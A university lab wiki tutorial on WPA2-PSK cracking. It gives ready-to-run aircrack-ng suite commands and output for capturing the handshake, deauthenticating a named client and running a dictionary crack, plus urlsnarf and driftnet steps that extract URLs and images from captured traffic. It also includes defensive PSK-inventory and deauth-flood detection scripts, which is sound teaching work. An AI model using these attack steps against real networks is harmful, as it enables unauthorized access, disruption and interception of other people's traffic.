WiFi Sniffing

From Embedded Lab Vienna for IoT & Security

Summary

Sniff Wi-Fi traffic using wireless interfaces that support monitor mode and packet injection (*). WPA/WPA2 uses various types of authentication. Aircrack-ng is only capable of cracking pre-shared keys! This means only networks using PSK can be attacked. (To determine whether a network uses PSK, airodump-ng can be used.) The method used to crack the pre-shared key is a plain brute-force attack over a word list, so the PSK needs to be in the dictionary used for the attack. If it is not in the list, aircrack-ng cannot determine the key. For WPA/WPA2 cracking the initial 4-way handshake is needed. This handshake is conducted between a client and the AP when the client tries to connect to the network.

Requirements

Prerequisites

The following information about the hardware used is needed:

  • MAC of a wireless client in the network: 34:B2:0A:7D:17:77
  • BSSID: 68:02:B8:1F:A1:3A
  • ESSID: WLAN18250073
  • Channel used by AP: 11
  • Wireless interface: wlan0mon

Description

Overview

The following steps are needed to get the password:

1) Use monitor mode on the wireless interface using the AP channel

2) Using airodump-ng on AP channel, collecting needed handshake

3) Use aireplay-ng to deauthenticate a wireless client in the network

4) Use aircrack-ng to crack the key using the collected handshake

Step 1 - Use monitor mode on the wireless interface using the AP channel

To listen to every packet in the air the wireless card needs to be in monitor mode. If a wireless card is not in monitor mode it only captures packets addressed to itself. When listening to every packet sent, an attacker eventually captures a 4-way handshake, which is used to crack WPA/WPA2. Additionally, one can deauthenticate wireless clients, as explained in a later step.


Depending on the driver used by the card, different methods need to be used to enable monitor mode. This tutorial only shows the procedure for the madwifi-ng driver; for further information look at aircrack-ng's tutorial.

Open a terminal and type:

airmon-ng

to determine the driver your card is using. The output with a wireless card from Atheros is the following:

PHY     Interface       Driver          Chipset
phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n

The next step is to switch to monitor mode. Syntax: airmon-ng start <interface> <channel used by AP>. Because we don't yet know the channel used by the AP, we start monitor mode without a specific channel:

airmon-ng start wlan0 

Output:

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
   PID Name
   605 NetworkManager
  2948 wpa_supplicant
PHY     Interface       Driver          Chipset
phy0    wlan0mon        ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
               (mac80211 monitor mode already enabled for [phy0]wlan0mon on [phy0]wlan0mon)

Now we can check if the interface is in monitor mode using iwconfig:

iwconfig
lo        no wireless extensions.
eth0      no wireless extensions.
tun0      no wireless extensions.
wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
         Retry short limit:7   RTS thr:off   Fragment thr:off
         Power Management:off

As we can see, the interface changed its name from wlan0 to wlan0mon and is in monitor mode. With airodump-ng <interface> we can monitor all APs within reach.

airodump-ng wlan0mon

The output shows all APs with information such as ESSID, BSSID, PWR, beacons, channel, encryption, cipher, and authentication method used.

CH  4 ][ Elapsed: 1 min ][ 2021-12-17 10:40                                                                                                                                                                                        
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                                    
68:02:B8:1F:A1:3A  -50       46       31    0  11  130   WPA2 CCMP   PSK  WLAN18250073

Important for the further attack are the BSSID (68:02:B8:1F:A1:3A) and the channel used (11).
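The summary says airodump-ng is how you determine whether a network uses PSK, and the table above is where that information appears. As an added example (not part of the original tutorial), the following Python script parses the airodump-ng AP table exactly as it is printed on screen and reports which networks use PSK authentication, which is the inventory a defender wants before deciding which SSIDs need a stronger passphrase or a move to 802.1X. The sample screen text is constructed for this example: it contains the tutorial's own AP line plus three invented networks (an enterprise, an open and a WEP network). The parser assumes the column layout shown above and locates the left-aligned text columns (ENC, CIPHER, AUTH, ESSID) from the header line, so an ESSID containing spaces is still read correctly.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample of airodump-ng's AP table (same layout as the tutorial's
# screen output). Only the first AP line is from the tutorial; the other three
# networks are invented for this example.
SAMPLE_AIRODUMP_OUTPUT = """\
CH  4 ][ Elapsed: 1 min ][ 2021-12-17 10:40

BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

68:02:B8:1F:A1:3A  -50       46       31    0  11  130   WPA2 CCMP   PSK  WLAN18250073
00:11:22:33:44:55  -70       12        0    0   6   54   WPA2 CCMP   MGT  corp-eap
AA:BB:CC:DD:EE:FF  -80        5        0    0   1   54   OPN              Cafe Guest
DE:AD:BE:EF:00:01  -65       20        3    0  11  130   WEP  WEP         legacy
"""

MAC_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


@dataclass
class AccessPoint:
    bssid: str
    power: int
    beacons: int
    data: int
    channel: int
    rate: str        # MB column; kept as text because airodump prints e.g. "54e."
    enc: str
    cipher: str
    auth: str
    essid: str


def _text_columns(header: str) -> Dict[str, int]:
    """Character offsets of the left-aligned text columns, taken from the header line."""
    return {name: header.index(name) for name in ("ENC", "CIPHER", "AUTH", "ESSID")}


def parse_airodump_ap_table(screen: str) -> List[AccessPoint]:
    """Parse the AP section of an airodump-ng screen dump into AccessPoint records."""
    aps: List[AccessPoint] = []
    cols = None
    for line in screen.splitlines():
        stripped = line.strip()
        if not stripped:
            continue
        if stripped.startswith("BSSID"):
            if cols is not None:       # second "BSSID ..." header is the station table: stop
                break
            cols = _text_columns(line)
            continue
        if cols is None:               # status line printed before the header
            continue
        # The numeric columns are whitespace separated; the text columns are sliced
        # by header position so empty CIPHER/AUTH cells and spaces in ESSIDs survive.
        fields = line.split()
        if len(fields) < 7 or not MAC_RE.match(fields[0]):
            continue
        aps.append(AccessPoint(
            bssid=fields[0].upper(),
            power=int(fields[1]), beacons=int(fields[2]), data=int(fields[3]),
            channel=int(fields[5]), rate=fields[6],
            enc=line[cols["ENC"]:cols["CIPHER"]].strip(),
            cipher=line[cols["CIPHER"]:cols["AUTH"]].strip(),
            auth=line[cols["AUTH"]:cols["ESSID"]].strip(),
            essid=line[cols["ESSID"]:].strip(),
        ))
    return aps


def classify(ap: AccessPoint) -> str:
    """Risk summary per network, following the distinction the tutorial's summary makes."""
    if ap.enc == "OPN":
        return "open network: traffic is readable by anyone in range"
    if ap.enc == "WEP":
        return "WEP: broken cipher, should be retired"
    if ap.auth == "PSK":
        return "WPA/WPA2-PSK: exposed to an offline dictionary attack once a handshake is captured"
    if ap.auth == "MGT":
        return "WPA/WPA2-Enterprise (802.1X): per-user credentials, not a PSK target for aircrack-ng"
    return "other/unknown"


def psk_networks(aps: List[AccessPoint]) -> List[Tuple[str, str, int]]:
    """(BSSID, ESSID, channel) of every network that uses a pre-shared key."""
    return [(ap.bssid, ap.essid, ap.channel) for ap in aps if ap.auth == "PSK"]


if __name__ == "__main__":
    for ap in parse_airodump_ap_table(SAMPLE_AIRODUMP_OUTPUT):
        print(f"{ap.bssid}  ch {ap.channel:>2}  {ap.essid!r:16} -> {classify(ap)}")
```

Run against a real screen dump, the same parser works on a file produced with script(1) or on the text copied from the terminal; the CSV that airodump-ng writes alongside the capture is the more robust source for automation, but the screen layout is what the tutorial shows.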

Step 2 - Using airodump-ng on AP channel, collecting needed handshake

Now that we have the BSSID and channel of the AP we can start capturing the 4-way handshake with the command airodump-ng -c <channel> --bssid <bssid> -w <filename> <interface>:

airodump-ng -c 11 --bssid 68:02:B8:1F:A1:3A -w CapturedData wlan0mon

Output:

CH 11 ][ Elapsed: 12 s ][ 2021-12-17 11:38                    4-Way Handshake CAPTURED                                                                                                                                                                                                                                                                                                                                                                                                                        
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                                                                                                                                                                                                                                                                                                               
68:02:B8:1F:A1:3A  -48  24       63       62    2  11  130   WPA2 CCMP   PSK  WLAN18250073                                                                                                                                                                                                                                                                                           
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                                                                                                                                                                                                                                                                                               
68:02:B8:1F:A1:3A  5C:5F:67:29:51:76  -18    0e- 0e     3       62                                                                                                                                                                       
68:02:B8:1F:A1:3A  66:60:B5:63:1F:B9  -58    0 - 1      0        2

Note: In the top right corner it says 4-Way Handshake CAPTURED. This is just a placeholder edited in; nothing is shown there until a handshake is captured. When captured it says: [ WPA handshake: 68:02:B8:1F:A1:3A

Now the tool collects every packet from this AP. It can take quite a while until a 4-way handshake takes place; Step 3 helps to speed things up.

Step 3 - Use aireplay-ng to deauthenticate a wireless client in the network

A faster way to capture the 4-way handshake is to connect an additional client to the wireless network manually. When connecting to the network, the AP starts the 4-way handshake. Because this is impractical, an attacker can deauthenticate clients already connected to the WiFi network to force a new 4-way handshake. The BSSID and the MAC of the device to deauthenticate are needed to conduct the attack. Deauthentication is started with aireplay-ng -0 <number of deauths to send> -a <BSSID> -c <MAC of client> <interface>. It is important to note that while a client is being deauthenticated, the tool used in Step 2 still needs to be running to capture the packets!

aireplay-ng -0 10 -a 68:02:B8:1F:A1:3A -c 34:B2:0A:7D:17:77 wlan0mon

The output:

11:21:15  Waiting for beacon frame (BSSID: 68:02:B8:1F:A1:3A) on channel 11
11:21:16  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs]
11:21:17  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|54 ACKs]
11:21:17  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|59 ACKs]
11:21:18  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|73 ACKs]
11:21:19  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|61 ACKs]
11:21:20  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|52 ACKs]
11:21:20  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|65 ACKs]
11:21:21  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|60 ACKs]
11:21:22  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|63 ACKs]
11:21:22  Sending 64 directed DeAuth (code 7). STMAC: [34:B2:0A:7D:17:77] [ 0|66 ACKs]
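The output above is what the attack looks like from the sender's side: bursts of 64 directed deauthentication frames per second, all with reason code 7, aimed at one client. From the network owner's side the same burst is easy to spot in a monitor-mode capture, because legitimate deauthentications are rare and isolated. As an added example (not part of the original tutorial), the following Python script reads a pcap with radiotap link type, extracts deauthentication and disassociation frames, and raises an alert when one BSSID/station pair sees more than a threshold of them inside a sliding time window. The capture it analyses is constructed inside the script (a few beacons, one ordinary "client leaving" deauth, then a 64-frame burst using the tutorial's BSSID and client MAC); the window and threshold values are assumptions chosen for this example.

```python
import struct
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional, Tuple

# Addresses from the tutorial's prerequisites. The capture built below is
# constructed for this example, not recorded from the air.
AP_BSSID = "68:02:B8:1F:A1:3A"
CLIENT = "34:B2:0A:7D:17:77"

LINKTYPE_IEEE802_11_RADIOTAP = 127
SUBTYPE_DISASSOC, SUBTYPE_DEAUTH = 10, 12          # 802.11 management subtypes


def mac_to_str(raw: bytes) -> str:
    return ":".join(f"{b:02X}" for b in raw)


def iter_dot11_frames(pcap: bytes) -> Iterator[Tuple[float, bytes]]:
    """Yield (timestamp, 802.11 frame) from a little-endian pcap with radiotap headers."""
    magic, = struct.unpack("<I", pcap[:4])
    if magic != 0xA1B2C3D4:
        raise ValueError("expected a little-endian microsecond-resolution pcap")
    linktype, = struct.unpack("<I", pcap[20:24])
    if linktype != LINKTYPE_IEEE802_11_RADIOTAP:
        raise ValueError(f"expected radiotap link type 127, got {linktype}")
    off = 24
    while off + 16 <= len(pcap):
        ts_sec, ts_usec, incl_len, _ = struct.unpack("<IIII", pcap[off:off + 16])
        off += 16
        pkt = pcap[off:off + incl_len]
        off += incl_len
        rt_len, = struct.unpack("<H", pkt[2:4])   # radiotap it_len: skip the radio header
        yield ts_sec + ts_usec / 1e6, pkt[rt_len:]


def parse_deauth(dot11: bytes) -> Optional[Tuple[str, str, int]]:
    """Return (bssid, station, reason_code) for a deauth/disassoc frame, else None."""
    if len(dot11) < 26:
        return None
    fc0 = dot11[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
        return None
    addr1, addr2, addr3 = dot11[4:10], dot11[10:16], dot11[16:22]
    reason, = struct.unpack("<H", dot11[24:26])
    # addr3 is the BSSID; the station is whichever of addr1/addr2 is not the AP,
    # so AP->client and client->AP frames land on the same key.
    station = addr1 if addr2 == addr3 else addr2
    return mac_to_str(addr3), mac_to_str(station), reason


@dataclass
class Alert:
    bssid: str
    station: str
    count: int
    first_ts: float
    last_ts: float
    reasons: Dict[int, int]


def detect_deauth_floods(pcap: bytes, window_s: float = 10.0, threshold: int = 10) -> List[Alert]:
    """Alert on any BSSID/station pair with >= threshold deauth/disassoc frames within window_s."""
    events: Dict[Tuple[str, str], List[Tuple[float, int]]] = defaultdict(list)
    for ts, frame in iter_dot11_frames(pcap):
        parsed = parse_deauth(frame)
        if parsed:
            bssid, station, reason = parsed
            events[(bssid, station)].append((ts, reason))
    alerts: List[Alert] = []
    for (bssid, station), evs in events.items():
        evs.sort()
        best, best_range, j = 0, (0, 0), 0
        for i in range(len(evs)):                  # sliding window over sorted timestamps
            while evs[i][0] - evs[j][0] > window_s:
                j += 1
            if i - j + 1 > best:
                best, best_range = i - j + 1, (j, i)
        if best >= threshold:
            lo, hi = best_range
            alerts.append(Alert(bssid, station, best, evs[lo][0], evs[hi][0],
                                dict(Counter(r for _, r in evs[lo:hi + 1]))))
    return alerts


# ---- constructed sample capture ------------------------------------------------
def _mac(s: str) -> bytes:
    return bytes.fromhex(s.replace(":", ""))


def _mgmt_frame(fc0: int, addr1: bytes, addr2: bytes, addr3: bytes, body: bytes = b"") -> bytes:
    # frame control, duration, addr1..3, sequence control, body (no FCS)
    return bytes([fc0, 0x00]) + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00" + body


def _record(ts: float, dot11: bytes) -> bytes:
    payload = bytes([0, 0]) + struct.pack("<HI", 8, 0) + dot11   # minimal 8-byte radiotap header
    sec = int(ts)
    usec = int(round((ts - sec) * 1e6))
    return struct.pack("<IIII", sec, usec, len(payload), len(payload)) + payload


def build_sample_capture() -> bytes:
    ap, sta = _mac(AP_BSSID), _mac(CLIENT)
    records = [_record(100.0 + i * 0.1, _mgmt_frame(0x80, b"\xff" * 6, ap, ap)) for i in range(5)]  # beacons
    records.append(_record(150.0, _mgmt_frame(0xC0, ap, sta, ap, struct.pack("<H", 3))))  # client leaving (reason 3)
    for i in range(64):   # burst of directed deauths "from the AP" to the client, reason 7, within ~1 s
        records.append(_record(200.0 + i * 0.015, _mgmt_frame(0xC0, sta, ap, ap, struct.pack("<H", 7))))
    header = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11_RADIOTAP)
    return header + b"".join(records)


if __name__ == "__main__":
    for a in detect_deauth_floods(build_sample_capture()):
        print(f"deauth flood: {a.count} frames to {a.station} on {a.bssid} "
              f"in {a.last_ts - a.first_ts:.2f}s, reasons={a.reasons}")
```

On a real capture written by airodump-ng (the CapturedData-01.cap file from Step 2 has exactly this link type), replace build_sample_capture() with the file's bytes. The single reason-3 frame stays below the threshold while the 64-frame burst trips it, which is the distinction the detector is meant to make.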

Step 4 - Use aircrack-ng to crack the key using the collected handshake

In this step, the captured 4-way handshake is used to crack the pre-shared key. The captured data is stored in a file called CapturedData (used in Step 2: -w CapturedData). One can use a dictionary which comes with aircrack-ng called "password.lst". Using the command:

aircrack-ng -w password.lst -b 68:02:B8:1F:A1:3A CapturedData*.cap

  • -w password.lst is the dictionary used
  • -b is the BSSID of the AP
  • The wildcard at the end of CapturedData is needed because aircrack-ng created multiple files

The output looks as follows:

                [00:00:00] 2 keys tested (36.20 k/s)


                        KEY FOUND! [ AKITs1!]


   Master Key     : <Master Key>

   Transient Key  : <Transient Key>



Filter URLs from captured traffic:

urlsnarf -p alfa-01.cap

Filter pictures from captured traffic:

driftnet -f alfa-01.cap -a -d Pictures/

Disable monitor mode:

airmon-ng stop wlan1mon

(*) Test if the adapter supports injection:

aireplay-ng -9 wlan1mon

Detailed information about wireless adapters available in ELVIS can be found here.

(**) This command did not work with ALFA NETWORK AWUS036ACH and ALFA NETWORK AWUS036EAC. The following commands are an alternative way to start monitor mode on the adapter:

ifconfig wlan1 down
iwconfig wlan1 mode monitor
ifconfig wlan1 up

Results

Browser                            urlsnarf                           driftnet
Microsoft Edge (Windows 10 host)   no results reading the pcap file   no results reading the pcap file
Mozilla Firefox (Windows 10 host)  no results reading the pcap file   no results reading the pcap file
Google Chrome (Windows 10 host)    no results reading the pcap file   no results reading the pcap file
Google Chrome (Android host)       no results reading the pcap file   no results reading the pcap file
Samsung Internet (Android host)    URLs captured                      images captured

Used Hardware

References